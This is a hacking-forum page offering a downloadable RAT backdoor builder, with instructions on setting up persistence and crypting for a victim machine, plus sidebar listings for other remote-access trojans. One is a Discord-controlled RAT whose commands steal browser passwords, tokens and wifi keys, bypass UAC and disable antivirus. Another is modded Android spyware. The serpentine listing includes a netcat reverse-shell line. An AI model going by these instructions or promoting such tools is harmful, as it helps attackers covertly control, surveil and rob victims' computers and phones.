Welcome to The Forum

Register now to gain access to all of our features. Once registered and logged in, you will be able to create topics, post replies to

existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile

and so much more. This message will be removed once you have signed in.

Active Hackers

The best community of active hackers. This community has been working in hacking for more than 10 years.

 

Hacker Forum

Hacker from all countries join this community to share their knowledge and their hacking tools

    Hacking Tools

    You can find thousands of tools shared by hackers. RAT's, Bot's, Crypters FUD, Stealers, Binders, Ransomware, Mallware, Virus, Cracked Accounts, Configs, Guides, Videos and many other things.

      PRIV8

      Become a Priv8 user and access all parts of the forum without restrictions and without limit of download. It only costs 100 dollars, and it will last you for a lifetime.

      Read Rules

      In this community we follow and respect rules, and they are the same for everyone, regardless of the user's rank. Read the rules well not to be prohibited.

      dEEpEst

      Anti Globalizacion RAT

      Recommended Posts

      Staff

      Hidden Content

        Give reaction to this post to see the hidden content.

       

      Hidden Content

        Give reaction to this post to see the hidden content.

       

      Here you can create your backdoor. Do not use things randomly, because if you misuse the options the backdoor can work badly. If for example you want a backdoor that penetrates without startups, do not put options, leave everything like that, you have to put only the ip and the door. If instead you want the backdoor to start even when the computer is restarted, you only have to put Start Up, if you want also, you can put Installation on (none). If you want you can also create an empty backdoor, like the first one I explained to you, then use hotfusion to put it in start up (not in local machine). If you create a 64-bit backdoor but your pc slave has a 32-bit system, it does not work. If you put the icon on your backdoor, you can not put backdoor + ico build, it makes no sense. So use the options intelligently. For example, if you encrypt, you have to create an empty backdoor with no options, no start up, no icons, no nines and then crypts. 

      Last thing. The backdoors were created without binder. Everything that starts with the backdoor (such as ccleaner) has been inserted directly into the stub. I did not use the binder.
      Enjoy!
       

      Download:

      Hidden Content

        Give reaction to this post to see the hidden content.

      Password:

      level23hacktools.com

      Share this post


      Link to post
      Share on other sites
      Em 09/09/2018 em 18:28, dEEpEst disse:

       

      Hidden Content

      • Give reaction to this post to see the hidden content.

       

       

       

      Hidden Content

      • Give reaction to this post to see the hidden content.

       

       

      Here you can create your backdoor. Do not use things randomly, because if you misuse the options the backdoor can work badly. If for example you want a backdoor that penetrates without startups, do not put options, leave everything like that, you have to put only the ip and the door. If instead you want the backdoor to start even when the computer is restarted, you only have to put Start Up, if you want also, you can put Installation on (none). If you want you can also create an empty backdoor, like the first one I explained to you, then use hotfusion to put it in start up (not in local machine). If you create a 64-bit backdoor but your pc slave has a 32-bit system, it does not work. If you put the icon on your backdoor, you can not put backdoor + ico build, it makes no sense. So use the options intelligently. For example, if you encrypt, you have to create an empty backdoor with no options, no start up, no icons, no nines and then crypts. 

      Last thing. The backdoors were created without binder. Everything that starts with the backdoor (such as ccleaner) has been inserted directly into the stub. I did not use the binder.
      Enjoy!
       

      Download:

       

      Hidden Content

      • Give reaction to this post to see the hidden content.

       

      Password:

      level23hacktools.com

      nice work 

      Share this post


      Link to post
      Share on other sites
      Staff
      hace 10 horas, cupado dijo:

      thanks very good

      Read Rules .... No Spam of thanks or banned

      Share this post


      Link to post
      Share on other sites
      Guest
      This topic is now closed to further replies.

      • Similar Content

        • By itsMe

          Hidden Content
          Give reaction to this post to see the hidden content. C++/Win32/Boost Windows RAT (Remote Administration Tool) with a multiplatform Java/Spring RESTful C2 server and Go, C++/Qt5 frontends.
          Disclaimer: serpentine is created for educational and research purposes, and is only intended to be employed in legal red team operations. Malicious and illegal use is not condoned and author/contributors do not take any responsbility for any damage caused by malicious actors using any software presented herein.
          serpentine is a Windows RAT (Remote Administration Tool) that lets you interact with the clients using a multiplatform RESTful C2 server.
          Functionalities:
              Startup
              Get files
              Put files
              Keylogger (Just get %APPDATA%/svchost/log file)
              Reverse shell (Using netcat as a client, listen on a port nc -l -p 5555 and request a reverse shell connection to that port)
              Reverse proxy (Using revp, upload revp to the client and execute it with a reverse shell)
              Take screenshots
              Remote desktop (Using qtserpentine frontend) [Work in progress, sending input is still in development]

          Hidden Content
          Give reaction to this post to see the hidden content.
        • By itsMe

          Hidden Content
          Give reaction to this post to see the hidden content.  

          Hidden Content
          Give reaction to this post to see the hidden content.  
        • By itsMe

          Hidden Content
          Give reaction to this post to see the hidden content. DeBlocker is a powerful tool and money-saving plugin for websites created by WordPress. The goal of this Plugin is to ask a website visitor to disable browser extensions that block ads. The Plugin defines most browser extensions for ads blocking, such as AdBlock & Adblock Plus, uBlock & uBlocker, AdGuard AdBlocker, Poper Blocker, Ads Killer, Adaware Ad Block, Easy Ad Blocker, and many others.
          The second version of the plugin has a new logic of work and a dynamical script that is difficult to detect for any AdBlock extension. The new script perfectly recognizes all the well-known ad blockers and blocks website content to protect it.
          Anti AdBlock WordPress Plugin is a handy utility for those who produce high-quality original content and do not want to lose money because of ad blockers.
          DeBlocker is designed to block the use of AdBlocker extensions maximally. The user will not be able to open the context menu, not be able to select and copy something on the page, and will not be able to use hotkeys until he turns off AdBlock.
          Hidden Content
          Give reaction to this post to see the hidden content.

          Hidden Content
          Give reaction to this post to see the hidden content.
        • By itsMe

          Hidden Content
          Give reaction to this post to see the hidden content. Discord Remote Administration Tool fully written in Python3
          Disclaimer:
          This tool is for educational use only, the author will not be held responsible for any misuse of this tool.
          Modules
          Availaible commands are :
          --> !message = Show a message box displaying your text / Syntax  = "!message example"
          --> !shell = Execute a shell command /Syntax  = "!shell whoami"
          --> !webcampic = Take a picture from the webcam
          --> !windowstart = Start logging current user window (logging is shown in the bot activity)
          --> !windowstop = Stop logging current user window
          --> !voice = Make a voice say outloud a custom sentence / Syntax = "!voice test"
          --> !admincheck = Check if program has admin privileges
          --> !sysinfo = Gives info about infected computer
          --> !history = Get chrome browser history
          --> !download = Download a file from infected computer
          --> !upload = Upload file from website to computer / Syntax = "!upload file.png" (with attachment)
          --> !cd = Changes directory
          --> !delete = deletes a file / Syntax = "!delete /path to/the/file.txt"
          --> !write = Type your desired sentence on computer / Type "enter" to press the enter button on the computer
          --> !wallpaper = Change infected computer wallpaper / Syntax = "!wallpaper" (with attachment)
          --> !clipboard = Retrieve infected computer clipboard content
          --> !geolocate = Geolocate computer using latitude and longitude of the ip adress with google map / Warning : Geolocating IP adresses is not very precise
          --> !startkeylogger = Starts a keylogger
          --> !stopkeylogger = Stops keylogger
          --> !dumpkeylogger = Dumps the keylog
          --> !volumemax = Put volume to max
          --> !volumezero = Put volume at 0
          --> !idletime = Get the idle time of user's on target computer
          --> !blockinput = Blocks user's keyboard and mouse / Warning : Admin rights are required
          --> !unblockinput = Unblocks user's keyboard and mouse / Warning : Admin rights are required
          --> !screenshot = Get the screenshot of the user's current screen
          --> !exit = Exit program
          --> !kill = Kill a session or all sessions / Syntax = "!kill session-3" or "!kill all"
          --> !uacbypass = attempt to bypass uac to gain admin by using fod helper
          --> !passwords = grab all chrome passwords
          --> !streamwebcam = streams webcam by sending multiple pictures
          --> !stopwebcam = stop webcam stream
          --> !getdiscordinfo = get discord token,email,phone number,etc
          --> !streamscreen = stream screen by sending multiple pictures
          --> !stopscreen = stop screen stream
          --> !shutdown = shutdown computer
          --> !restart = restart computer
          --> !logoff = log off current user
          --> !bluescreen = BlueScreen PC
          --> !displaydir = display all items in current dir
          --> !currentdir = display the current dir
          --> !dateandtime = display system date and time
          --> !prockill = kill a process by name / syntax = "!kill process.exe"
          --> !recscreen = record screen for certain amount of time / syntax = "!recscreen 10"
          --> !reccam = record camera for certain amount of time / syntax = "!reccam 10"
          --> !recaudio = record audio for certain amount of time / syntax = "!recaudio 10"
          --> !disableantivirus = permanently disable windows defender(requires admin)
          --> !disablefirewall = disable windows firewall (requires admin)
          --> !audio = play a audio file on the target computer(.wav only) / Syntax = "!audio" (with attachment)
          --> !selfdestruct = delete all traces that this program was on the target PC
          --> !windowspass = attempt to phish password by poping up a password dialog
          --> !displayoff = turn off the monitor(Admin rights are required)
          --> !displayon = turn on the monitors(Admin rights are required)
          --> !hide = hide the file by changing the attribute to hidden
          --> !unhide = unhide the file the removing the attribute to make it unhidden
          --> !ejectcd = eject the cd drive on computer
          --> !retractcd = retract the cd drive on the computer
          --> !critproc = make program a critical process. meaning if its closed the computer will bluescreen(Admin rights are required)
          --> !uncritproc = if the process is a critical process it will no longer be a critical process meaning it can be closed without bluescreening(Admin rights are required)
          --> !website = open a website on the infected computer / syntax = "!website google.com" or "!website www.google.com"
          --> !distaskmgr = disable task manager(Admin rights are required)
          --> !enbtaskmgr = enable task manager(if disabled)(Admin rights are required)
          --> !getwifipass = get all the wifi passwords on the current device(Admin rights are required)
          --> !startup = add file to startup(when computer go on this file starts)(Admin rights are required)

          Hidden Content
          Give reaction to this post to see the hidden content.  
        • By itsMe

          Hidden Content
          Give reaction to this post to see the hidden content.
          Hidden Content
          Give reaction to this post to see the hidden content.
          Hidden Content
          Give reaction to this post to see the hidden content.
          Hidden Content
          Give reaction to this post to see the hidden content.
          Hidden Content
          Give reaction to this post to see the hidden content. New Android Remote Tool (SpyMax Modded Version)
          Tested on Android : 5,6,7,8,9,10,11
          Application Features :
          ------
          Manage :
          .Files
          .Sms
          .contacts
          .Calls
          .Applications
          .Accounts
          ------
          Monitor :
          .camera
          .live screen
          .microphone
          .keylogger
          .Location
          . real time calls monitor
          ------
          tools :
          .Download apk and install
          .show message
          .open link
          .call number
          .phone info
          -----
          Social media Hunter:
          - Facebook
          - gmail
          - more coming soon
          ------
          super mode :
          -Anti-Kill
          -Anti-Delete
          -Realtime Monitor Active App
          -Auto Click Start Screen Record
          -Anti shutdown phone

          New Update Free Version :
          -Auto grant Request battery optimization [ super mod ]
          -update anti-remove to work on more phones [ super mod ]
          -hide bars when camera open
          -more stable payload for weak phones


          Hidden Content
          Give reaction to this post to see the hidden content. Scan Server

          Hidden Content
          Give reaction to this post to see the hidden content. https://kleenscan.com/scan_result/21e0b3f3836456ce701dfc2bf66241efd6a9586966ec6658157332782624f4b0